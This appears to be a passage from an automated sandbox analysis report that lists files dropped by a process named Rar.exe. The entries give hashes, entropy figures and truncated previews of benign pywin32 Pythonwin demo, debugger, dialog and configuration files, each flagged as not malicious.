                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):2191
                                                                                                                                                                                                                                  Entropy (8bit):4.850454871968149
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:ObpYmP20TqATZmgHqKG7nJ6XlcMKJC7yN2VpXfCpk80Don:Obpv07JIxgC7yNV0Don
                                                                                                                                                                                                                                  MD5:33C1937B141288687F5B1C16FE3096E6
                                                                                                                                                                                                                                  SHA1:FA6D59C5341185E45E9BC2D46C9BF739DDDCE239
                                                                                                                                                                                                                                  SHA-256:D58A77874F80AF628C9AC2A2901FDC9E6A2662A302F7068B59091472BC07CC8E
                                                                                                                                                                                                                                  SHA-512:7BA2215F1626FA752D46F1F73D5D13FD10600A8653901002F32AE94BB3301B85912E60B31D12AD24ACC98322AEA8910CB4D2EAF7B8472DE97F3B613433524296
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# sliderdemo.py.# Demo of the slider control courtesy of Mike Fletcher...import win32con.import win32ui.from pywin.mfc import dialog...class MyDialog(dialog.Dialog):. """. Example using simple controls. """.. _dialogstyle = (. win32con.WS_MINIMIZEBOX. | win32con.WS_DLGFRAME. | win32con.DS_MODALFRAME. | win32con.WS_POPUP. | win32con.WS_VISIBLE. | win32con.WS_CAPTION. | win32con.WS_SYSMENU. | win32con.DS_SETFONT. ). _buttonstyle = (. win32con.BS_PUSHBUTTON. | win32con.WS_TABSTOP. | win32con.WS_CHILD. | win32con.WS_VISIBLE. ). ### The static template, contains all "normal" dialog items. DIALOGTEMPLATE = [. # the dialog itself is the first element in the template. ["Example slider", (0, 0, 50, 43), _dialogstyle, None, (8, "MS SansSerif")],. # rest of elements are the controls within the dialog. # standard "Close" button. [128, "Close", win32con.I
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):2847
                                                                                                                                                                                                                                  Entropy (8bit):4.889392873931691
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:tn2i6rCuuHYZYShNY9qG+CWclj3hlj3Zlj3YtVrbSTziVfudj1dKKTMH8jRH94wS:p6rCu+YUlhWcPXGOPiVfudjmKTMcjRd6
                                                                                                                                                                                                                                  MD5:15A3380DB3440FCC03C11FEF948C3FD0
                                                                                                                                                                                                                                  SHA1:9C618E91EB3D4633B1E65790BC001BD11340F782
                                                                                                                                                                                                                                  SHA-256:8596A440DBDF0B5982E29C1B04D504904411A76AA432CD61FA502EDD05D4BCC1
                                                                                                                                                                                                                                  SHA-512:0A89815554A35E8BA9CF44D21081738BE1C936F46D8A26EF46D95BB6F8C35FF058F1082571C6F1AFC0F458B6F8184CF8DA617F144A33302AE8EE47C9CD55988B
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:import commctrl.import fontdemo.import win32ui.from pywin.mfc import docview, window..# derive from CMDIChild. This does much work for us....class SplitterFrame(window.MDIChildWnd):. def __init__(self):. # call base CreateFrame. self.images = None. window.MDIChildWnd.__init__(self).. def OnCreateClient(self, cp, context):. splitter = win32ui.CreateSplitter(). doc = context.doc. frame_rect = self.GetWindowRect(). size = ((frame_rect[2] - frame_rect[0]), (frame_rect[3] - frame_rect[1]) // 2). sub_size = (size[0] // 2, size[1]). splitter.CreateStatic(self, 2, 1). self.v1 = win32ui.CreateEditView(doc). self.v2 = fontdemo.FontView(doc). # CListControl view. self.v3 = win32ui.CreateListView(doc). sub_splitter = win32ui.CreateSplitter(). # pass "splitter" so each view knows how to get to the others. sub_splitter.CreateStatic(splitter, 1, 2). sub_splitter.CreateView(sel
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):6272
                                                                                                                                                                                                                                  Entropy (8bit):4.87279010428793
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:ncGYnTdMrmBZhpazipGrwpWSnTG3zXSjS+Opwy8nt:nAnZcziMrwZnuCu+Opgt
                                                                                                                                                                                                                                  MD5:DB53EA29EFF3B56F84E93B6500013F19
                                                                                                                                                                                                                                  SHA1:108322107120E73C4A6F949C702B6085A13DC656
                                                                                                                                                                                                                                  SHA-256:73E54A6C2971411F6DF38DECD4C1AB079552C746502DEBBEE2463078D3FF200F
                                                                                                                                                                                                                                  SHA-512:9D4A4F575106826762235A447C13509638CFC9A153EFC2AC168C9F4F413B0B12576B24312A170B9E8F61DE7F99A3EC5E363A8B8236DF8CE42927AEEA5D57AB00
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# Demo of using just windows, without documents and views...# Also demo of a GUI thread, pretty much direct from the MFC C++ sample MTMDI...import timer.import win32api.import win32con.import win32ui.from pywin.mfc import docview, thread, window.from pywin.mfc.thread import WinThread..WM_USER_PREPARE_TO_CLOSE = win32con.WM_USER + 32..# font is a dictionary in which the following elements matter:.# (the best matching font to supplied parameters is returned).# name..string name of the font as known by Windows.# size..point size of font in logical units.# weight..weight of font (win32con.FW_NORMAL, win32con.FW_BOLD).# italic..boolean; true if set to anything but None.# underline.boolean; true if set to anything but None...# This window is a child window of a frame. It is not the frame window itself..class FontWindow(window.Wnd):. def __init__(self, text="Python Rules!"):. window.Wnd.__init__(self). self.text = text. self.index = 0. self.incr = 1.
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):3165
                                                                                                                                                                                                                                  Entropy (8bit):4.871556617087529
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:s4IYirHY+7WzAAgDnqOYEZYR0QY1xeE4k7EMvHYq1lwOQdT5FpxYEGHBmyQLRu:0DY+qzuQR0QY1xTvYnbn1DABn0U
                                                                                                                                                                                                                                  MD5:96A780B1A5ECABF83F6EF7F4E719D706
                                                                                                                                                                                                                                  SHA1:DBC0202653E6347FB5CF4E3A76D61DF2762D7264
                                                                                                                                                                                                                                  SHA-256:C294B740EB59DBA1E53651856CA54B1010EAE6320DD500D9850A12D488100DA9
                                                                                                                                                                                                                                  SHA-512:C241101159235C880F0C3ED382BC7E3498C446B3F365D5BA09870E40C84859553FC5BF033A15817FA628A97E1412615EA63211DA427E80727C7B35B87678EA5A
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# Demo of ToolBars..# Shows the toolbar control..# Demos how to make custom tooltips, etc...import commctrl.import win32api.import win32con.import win32ui.from pywin.mfc import afxres, docview, window...class GenericFrame(window.MDIChildWnd):. def OnCreateClient(self, cp, context):. # handlers for toolbar buttons. self.HookCommand(self.OnPrevious, 401). self.HookCommand(self.OnNext, 402). # Its not necessary for us to hook both of these - the. # common controls should fall-back all by themselves.. # Indeed, given we hook TTN_NEEDTEXTW, commctrl.TTN_NEEDTEXTA. # will not be called.. self.HookNotify(self.GetTTText, commctrl.TTN_NEEDTEXT). self.HookNotify(self.GetTTText, commctrl.TTN_NEEDTEXTW).. # ..parent = win32ui.GetMainFrame(). parent = self. style = (. win32con.WS_CHILD. | win32con.WS_VISIBLE. | afxres.CBRS_SIZE_DYNAMIC. | afxres.CBRS_TOP. | a
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):742
                                                                                                                                                                                                                                  Entropy (8bit):4.500440373386235
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:12:1Si9ycCnLZTIDCoc9GrGFZA1ZSfuQ9UewZdfxR2sKVLm7BeXjZrAwEkTBAL:1SifyN0DBc9GSs+9uxxQsKVLmyjZLpTq
                                                                                                                                                                                                                                  MD5:FEA3E78BE03619E62D9D0596B3D30415
                                                                                                                                                                                                                                  SHA1:643A8486EFCA63316325B666A8F2660D9BF15DBD
                                                                                                                                                                                                                                  SHA-256:09CD334BBD8A9723360913DB63E1DD344BB5FAEACDA270B57529C0DA3B8AF73E
                                                                                                                                                                                                                                  SHA-512:3DA8A6CBA89649A561274091387F8D2CB574BB69A4184B3E8F2E16513BCD7FC7B40D8C5212FE67B22753A0604670C06A82CF0A62024D21DE6AA4A272D0E05D87
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:[General].# We base this configuration on the default config..# You can list "Based On" as many times as you like.Based On = default..[Keys].# Only list keys different to default..# Note you may wish to rebind some of the default.# Pythonwin keys to "Beep" or "DoNothing"..Alt+L = LocateSelectedFile.Ctrl+Q = AppExit..# Other non-default Pythonwin keys.Alt+A = EditSelectAll.Alt+M = LocateModule..# Movement.Ctrl+D = GotoEndOfFile..# Tabs and other indent features.Alt+T = <<toggle-tabs>>.Ctrl+[ = <<indent-region>>.Ctrl+] = <<dedent-region>>..[Keys:Interactive].Alt+P = <<history-previous>>.Alt+N = <<history-next>>..
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script text executable Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):3160
                                                                                                                                                                                                                                  Entropy (8bit):4.508513007580098
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:kb4rODdJujfsRxdCEY0P+Vj8u8x4TMyRlSiRlb9YHtGDWcXGZya5mx+Jj:kbCeujfsRxdCEY0PW8uK4T/RlSiRlb9I
                                                                                                                                                                                                                                  MD5:41C91B0140813BC8CC87C26CF7DD98BD
                                                                                                                                                                                                                                  SHA1:6E7F6FF9B6802ADAE1DB64823F8C9CD46B92302D
                                                                                                                                                                                                                                  SHA-256:E4CC4A2BE360D6CA1A2BF73A7C52210BE5FCFE15AF1381FB2347C8E66A2A71B0
                                                                                                                                                                                                                                  SHA-512:26B4ADEA5C66DE0AFBEC831189A8EED366E1F3CFB4E01BA9CA50F37DD32C4B7A362A80943BADD67F7CFBC6542AA2B9B3B00002EB727AC54DCC1F31F986243470
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:import sys...# Some cruft to deal with the Pythonwin GUI booting up from a non GUI app..def _MakeDebuggerGUI():. app.InitInstance()...isInprocApp = -1...def _CheckNeedGUI():. global isInprocApp. if isInprocApp == -1:. import win32ui.. isInprocApp = win32ui.GetApp().IsInproc(). if isInprocApp:. # MAY Need it - may already have one. need = "pywin.framework.app" not in sys.modules. else:. need = 0. if need:. import pywin.framework.app.. from . import dbgpyapp.. pywin.framework.app.CreateDefaultGUI(dbgpyapp.DebuggerPythonApp).. else:. # Check we have the appropriate editor. # No longer necessary!. pass. return need...# Inject some methods in the top level name-space..currentDebugger = None # Wipe out any old one on reload....def _GetCurrentDebugger():. global currentDebugger. if currentDebugger is None:. _CheckNeedGUI(). from . import debugger.. currentDebugger =
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1183
                                                                                                                                                                                                                                  Entropy (8bit):4.732521227343416
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:btWt6PTAxA5/Hpnz2AwEHAhryUHbAdPevN7ylHS9ei2:Y6PTwmnz2Aw6AhryUskl7iHS9ei2
                                                                                                                                                                                                                                  MD5:9F30DCEE5A9761D1972B9F613F932C50
                                                                                                                                                                                                                                  SHA1:AABB67A2926A7091D4ECCF9AFB3FADB50A8B690B
                                                                                                                                                                                                                                  SHA-256:D870FBD44C3969CA82BE1260B66C92DFE6EDFFB4F87D23506E0640D103E03C7F
                                                                                                                                                                                                                                  SHA-512:70B36C0493DB7D575CD455F693679111F6F4F59F33BD7B663D9FCF9C09AC72C013E5CE34869D62F45C7840F573DB60DDE332EDC1EE6F199ECE71D170E93477B0
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:import win32ui.from pywin.mfc import dialog..from . import dbgcon...class DebuggerOptionsPropPage(dialog.PropertyPage):. def __init__(self):. dialog.PropertyPage.__init__(self, win32ui.IDD_PP_DEBUGGER).. def OnInitDialog(self):. options = self.options = dbgcon.LoadDebuggerOptions(). self.AddDDX(win32ui.IDC_CHECK1, dbgcon.OPT_HIDE). self[dbgcon.OPT_STOP_EXCEPTIONS] = options[dbgcon.OPT_STOP_EXCEPTIONS]. self.AddDDX(win32ui.IDC_CHECK2, dbgcon.OPT_STOP_EXCEPTIONS). self[dbgcon.OPT_HIDE] = options[dbgcon.OPT_HIDE]. return dialog.PropertyPage.OnInitDialog(self).. def OnOK(self):. self.UpdateData(). dirty = 0. for key, val in list(self.items()):. if key in self.options:. if self.options[key] != val:. self.options[key] = val. dirty = 1. if dirty:. dbgcon.SaveDebuggerOptions(self.options). # If there is a debugger open, then set
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):845
                                                                                                                                                                                                                                  Entropy (8bit):5.242340248921855
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:8N3bW3FrvlwGPFjRTRPZgpXe5e6gewNhdintvgj:OW3FrvKWjRTRPQXF6DWhdita
                                                                                                                                                                                                                                  MD5:8A390D63882C0842EAC376270BFF2C53
                                                                                                                                                                                                                                  SHA1:C6B8A92591B61DDD2FA043FA8503E56630DC23F3
                                                                                                                                                                                                                                  SHA-256:E4705329844F721A47F176046BF9DFFD9BA11519E19F83361F88D3679610F7DD
                                                                                                                                                                                                                                  SHA-512:5350F07516A87D879C61B122671EA9DF0CA115A795EC6AB18230A8F87059F7A8EEA2A00FEBC40A38AF699AA464B04A9BDB5BA67D1A03B19BD5BC31335689316A
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# General constants for the debugger..DBGSTATE_NOT_DEBUGGING = 0.DBGSTATE_RUNNING = 1.DBGSTATE_BREAK = 2.DBGSTATE_QUITTING = 3 # Attempting to back out of the debug session...LINESTATE_CURRENT = 0x1 # This line is where we are stopped.LINESTATE_BREAKPOINT = 0x2 # This line is a breakpoint.LINESTATE_CALLSTACK = 0x4 # This line is in the callstack...OPT_HIDE = "hide".OPT_STOP_EXCEPTIONS = "stopatexceptions"..import win32api.import win32ui...def DoGetOption(optsDict, optName, default):. optsDict[optName] = win32ui.GetProfileVal("Debugger Options", optName, default)...def LoadDebuggerOptions():. opts = {}. DoGetOption(opts, OPT_HIDE, 0). DoGetOption(opts, OPT_STOP_EXCEPTIONS, 1). return opts...def SaveDebuggerOptions(opts):. for key, val in opts.items():. win32ui.WriteProfileVal("Debugger Options", key, val).
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1558
                                                                                                                                                                                                                                  Entropy (8bit):4.832730052620307
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:tsLtgxWvUmdvRsiZwAotaXzduXj7/2X0yKRluFrDLJ43iKMrGhgZ4CFLt4Bs21Hx:eLtgovUmdvCUyIWjhpaApMrGVWes2fD
                                                                                                                                                                                                                                  MD5:70ADAC0737589A094E215E979EF710B9
                                                                                                                                                                                                                                  SHA1:265D1CD5DD7AA08406D50877273C8897ECBA3B16
                                                                                                                                                                                                                                  SHA-256:FACDCAA49A31941B165DC13D8874AD9660D8D3505443C36C92C8C79219FB225D
                                                                                                                                                                                                                                  SHA-512:14BEBA71693E8B17E945E89727CBC1A9978E43C6288CDF49F751EEB563AD65A50F85032C44D0C23414F2A2AD9A149498315DD3CAE31E5C9B9D9809D3FE6E97F3
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# dbgpyapp.py - Debugger Python application class.#.import sys..import win32con.import win32ui.from pywin.framework import intpyapp..version = "0.3.0"...class DebuggerPythonApp(intpyapp.InteractivePythonApp):. def LoadMainFrame(self):. "Create the main applications frame". self.frame = self.CreateMainFrame(). self.SetMainFrame(self.frame). self.frame.LoadFrame(win32ui.IDR_DEBUGGER, win32con.WS_OVERLAPPEDWINDOW). self.frame.DragAcceptFiles() # we can accept these.. self.frame.ShowWindow(win32con.SW_HIDE). self.frame.UpdateWindow().. # but we do rehook, hooking the new code objects.. self.HookCommands().. def InitInstance(self):. # Use a registry path of "Python\Pythonwin Debugger. win32ui.SetAppName(win32ui.LoadString(win32ui.IDR_DEBUGGER)). win32ui.SetRegistryKey("Python %s" % (sys.winver,)). # We _need_ the Scintilla color editor.. # (and we _always_ get it now :-).. numMRU
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):37931
                                                                                                                                                                                                                                  Entropy (8bit):4.58728413955318
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:0T7LEoH5gnkC0sYIEo9YkwmfSQpKqTTDZ3rys4odsZ+wBF9nACwDJC:87LEoZFCEElysb+BFGw
                                                                                                                                                                                                                                  MD5:D299576416220004127894111BCFE164
                                                                                                                                                                                                                                  SHA1:14875221C32AD621F20CDCA4A3295F72DE363E8E
                                                                                                                                                                                                                                  SHA-256:0EB3E80F49D813EFF4F4861C9F9D47B2D0355019127789620D1DC2715E2321FA
                                                                                                                                                                                                                                  SHA-512:C08D46D9DF477B63E09D81EDAAB2E84E50541C9AACDFF99FC91563BB93E1075D0A380E7720C681677C7E7897F7AF594A335B1B6F1F67A5564E1466787838B20E
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# debugger.py..# A debugger for Pythonwin. Built from pdb...# Mark Hammond (MHammond@skippinet.com.au) - Dec 94...# usage:.# >>> import pywin.debugger.# >>> pywin.debugger.GetDebugger().run("command")..import bdb.import os.import pdb.import string.import sys.import traceback.import types..import commctrl.import pywin.docking.DockingBar.import win32api.import win32con.import win32ui.from pywin.framework import app, editor, interact, scriptutils.from pywin.framework.editor.color.coloreditor import MARKER_BREAKPOINT, MARKER_CURRENT.from pywin.mfc import afxres, dialog, object, window.from pywin.tools import browser, hierlist..# import win32traceutil.if win32ui.UNICODE:. LVN_ENDLABELEDIT = commctrl.LVN_ENDLABELEDITW.else:. LVN_ENDLABELEDIT = commctrl.LVN_ENDLABELEDITA..from .dbgcon import *..error = "pywin.debugger.error"...def SetInteractiveContext(globs, locs):. if interact.edit is not None and interact.edit.currentView is not None:. interact.edit.currentView.SetContext(
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):927
                                                                                                                                                                                                                                  Entropy (8bit):4.475632683391388
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:12:i/hppkcl/DSHG0mlHFpi67XjfRkDWyFX6SV8Oj8afFIC25+8I/gW2cTpUmY56iuM:QGclbWGdL1L8X1FICAgdXNUaEJ
                                                                                                                                                                                                                                  MD5:95B368EE7CF24DEE9C9BC5FC32400324
                                                                                                                                                                                                                                  SHA1:F78E46CE77E7CAE1241C9A8C7EE21C0DB66E9114
                                                                                                                                                                                                                                  SHA-256:E574D52E789A404DB2020B67F8B0178DA3F030991A7941EAA6483BAAE91438B5
                                                                                                                                                                                                                                  SHA-512:1781ABD39FACA0094650813025DDB281C2363CDE64BFE875D9E8964EEAAEFC6DDE4F5B8F997A7C0DA0DCB4A0925F2C34716D0652DC34E7FD0FFDD41AAFE9A9AA
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# NOTE NOTE - This module is designed to fail!.#.# The ONLY purpose for this script is testing/demoing the.# Pythonwin debugger package...# It does nothing useful, and it even doesnt do that!..import sys.import time..import pywin.debugger...def a():. a = 1. try:. b(). except:. # Break into the debugger with the exception information.. pywin.debugger.post_mortem(sys.exc_info()[2]). a = 1. a = 2. a = 3. a = 4...def b():. b = 1. pywin.debugger.set_trace(). # After importing or running this module, you are likely to be. # sitting at the next line. This is because we explicitely. # broke into the debugger using the "set_trace() function. # "pywin.debugger.brk()" is a shorter alias for this.. c()...def c():. c = 1. d()...def d():. d = 1. e(d). raise ValueError("Hi")...def e(arg):. e = 1. time.sleep(1). return e...a().
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):6785
                                                                                                                                                                                                                                  Entropy (8bit):4.800464733521227
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:mQScOaWjg912oOtOEaRt+JXsI9XIz9XI39ncAhMQi0T:lS2hOtOlt+J8I9XIz9XI3Rc4i0T
                                                                                                                                                                                                                                  MD5:DAD8AB84C464034B2AE584DD6B55D69C
                                                                                                                                                                                                                                  SHA1:101480A5142B768286C0242154DB25FF83843077
                                                                                                                                                                                                                                  SHA-256:1B9E8359F3A056305B8D251B5017CA2F952AFB420C1BE6A3FF7D5BB7F5F6B19F
                                                                                                                                                                                                                                  SHA-512:46F72D3CE370BB18005DECC44D9E56D08FCB62B8B24C11A48BAA26CCDA81B3B340D9D5CF9696BC7FA5CEFD36A534126235BF180515F54378ABFD504D54590724
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# The default keyboard etc configuration file for Pythonwin..#.# The format of this file is very similar to a Windows INI file..# Sections are identified with [Section] lines, but comments.# use the standatd Python # character. Depending on the section,.# lines may not be in the standard "key=value" format...# NOTE: You should not need to modify this file..# Simply create a new .CFG file, and add an entry:.# [General].# BasedOn = Default.#.# and add your customisations. Then select your new configuration .# from the Pythonwin View/Options/Editor dialog..# This way you get to add your own customisations,.# but still take advantage of changes to the default.# configuration in new releases...# See IDLE.cfg for an example extension configuration..#.##########################################################################..[IDLE Extensions]..# The list of IDLE extensions to load. The extensions.# AutoIndent, AutoFormat and possibly others are.# "built-in", so do not need specifying...F
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):5034
                                                                                                                                                                                                                                  Entropy (8bit):4.737064457897206
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:wmydTwuaTLjsiaT7uPvy+6NmwunRwm1kA31J5:wRPaT5aT8v16C/
                                                                                                                                                                                                                                  MD5:F111572B3FB1BC661E1E6DF5A9CF879D
                                                                                                                                                                                                                                  SHA1:A41173D1F88C61C3237248B097B2EFB08F5E25ED
                                                                                                                                                                                                                                  SHA-256:62A1EEEBB052D688D023D7520A7792617C2C52B25DC8B0DE985CA5B3AAB0C563
                                                                                                                                                                                                                                  SHA-512:C91478BF2173956F70A46FE7DA7D8E079356F94F16E7DCDD52377E29CF0FC0AE202908118DA9BFC1680C86A59FC227DE90E17E61B8730E45686CBDA6BD3187C6
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# The property page to define generic IDE options for Pythonwin..import win32con.import win32ui.from pywin.framework import interact.from pywin.mfc import dialog..buttonControlMap = {. win32ui.IDC_BUTTON1: win32ui.IDC_EDIT1,. win32ui.IDC_BUTTON2: win32ui.IDC_EDIT2,. win32ui.IDC_BUTTON3: win32ui.IDC_EDIT3,.}...class OptionsPropPage(dialog.PropertyPage):. def __init__(self):. dialog.PropertyPage.__init__(self, win32ui.IDD_PP_IDE). self.AddDDX(win32ui.IDC_CHECK1, "bShowAtStartup"). self.AddDDX(win32ui.IDC_CHECK2, "bDocking"). self.AddDDX(win32ui.IDC_EDIT4, "MRUSize", "i").. def OnInitDialog(self):. edit = self.GetDlgItem(win32ui.IDC_EDIT1). format = eval(. win32ui.GetProfileVal(. interact.sectionProfile,. interact.STYLE_INTERACTIVE_PROMPT,. str(interact.formatInput),. ). ). edit.SetDefaultCharFormat(format). edit.SetWindowText("Input Text")..
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):4553
                                                                                                                                                                                                                                  Entropy (8bit):4.726357289573743
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:kpMCQUjD1MKBsVQnCD5kI7uVwVUoic6fpEQ7xKbmHBNx7W0WLdX:Sp4/VkGKQPaRH0X
                                                                                                                                                                                                                                  MD5:37C1CD1DB9F810C204351229638F2C9D
                                                                                                                                                                                                                                  SHA1:E978FC55B612FACA725B84ED0C11B2CC7E6316A9
                                                                                                                                                                                                                                  SHA-256:6D756D51A6286E343F91A946DF409B0B9CE72F5E153CEAB0E826494E3E919D79
                                                                                                                                                                                                                                  SHA-512:6AAC4751DDEC0BD84F3C018CCF589C2A11103034B051567CF240AD9116F371CD27FF396A0332B5C0D7536A44E0C8E69B07EDEB5D287EF906B0CEAF3C38D53B81
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:import commctrl.import win32api.import win32con.import win32ui.from pywin.mfc import dialog...class ListDialog(dialog.Dialog):. def __init__(self, title, list):. dialog.Dialog.__init__(self, self._maketemplate(title)). self.HookMessage(self.on_size, win32con.WM_SIZE). self.HookNotify(self.OnListItemChange, commctrl.LVN_ITEMCHANGED). self.HookCommand(self.OnListClick, win32ui.IDC_LIST1). self.items = list.. def _maketemplate(self, title):. style = win32con.WS_DLGFRAME | win32con.WS_SYSMENU | win32con.WS_VISIBLE. ls = (. win32con.WS_CHILD. | win32con.WS_VISIBLE. | commctrl.LVS_ALIGNLEFT. | commctrl.LVS_REPORT. ). bs = win32con.WS_CHILD | win32con.WS_VISIBLE. return [. [title, (0, 0, 200, 200), style, None, (8, "MS Sans Serif")],. ["SysListView32", None, win32ui.IDC_LIST1, (0, 0, 200, 200), ls],. [128, "OK", win32con.IDOK, (10, 0, 50, 14)
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):4744
                                                                                                                                                                                                                                  Entropy (8bit):5.080896859294017
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:SPqoa8f4F5CiR1nA8uAImdWA5v7eanAxKFze7pnAYzFE7rUK1Q9u:VHq4FXXR0C4KJ2za7rb1Q9u
                                                                                                                                                                                                                                  MD5:D195D5022F44190D561AB48990C86946
                                                                                                                                                                                                                                  SHA1:79B0039267F5031D1275E9D5492FEEFF0A9EAAEA
                                                                                                                                                                                                                                  SHA-256:BBF5069FC221AA0FB7F61C7051467DA298539F2E482A06A2677D69CC6E066F8C
                                                                                                                                                                                                                                  SHA-512:8D4D461B435712AB659AD385C82F5E6D77D2F268C18E426F115AE08BC4162BDCFC76092994CEE7827447F79C45818EEE54C8C0990715F4EDE7D22AF56646B397
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:"""login -- PythonWin user ID and password dialog box..(Adapted from originally distributed with Mark Hammond's PythonWin - .this now replaces it!)..login.GetLogin() displays a modal "OK/Cancel" dialog box with input.fields for a user ID and password. The password field input is masked.with *'s. GetLogin takes two optional parameters, a window title, and a.default user ID. If these parameters are omitted, the title defaults to."Login", and the user ID is left blank. GetLogin returns a (userid, password).tuple. GetLogin can be called from scripts running on the console - i.e. you.don't need to write a full-blown GUI app to use it...login.GetPassword() is similar, except there is no username field...Example:.import pywin.dialogs.login.title = "FTP Login".def_user = "fred".userid, password = pywin.dialogs.login.GetLogin(title, def_user)..Jim Eggleston, 28 August 1996.Merged with dlgpass and moved to pywin.dialogs by Mark Hammond Jan 1998.."""..import win32api.import win32con.import win32u
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):6620
                                                                                                                                                                                                                                  Entropy (8bit):4.812249113668442
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:JQ1QjYT2ZcpPc0C1HdNzJUMzmQuWyricJY:FY4GPY19pyMyQ/yrid
                                                                                                                                                                                                                                  MD5:6A26E58C5BCC0944CF185DEE3151FFE9
                                                                                                                                                                                                                                  SHA1:1F8F6D4E63D75DE35AEAD6DBDC7F1A54526D8249
                                                                                                                                                                                                                                  SHA-256:1AD3D9AF7B5328E179A0B8DDE615936A2191102DC5C2714A1752FA5E000D6DEE
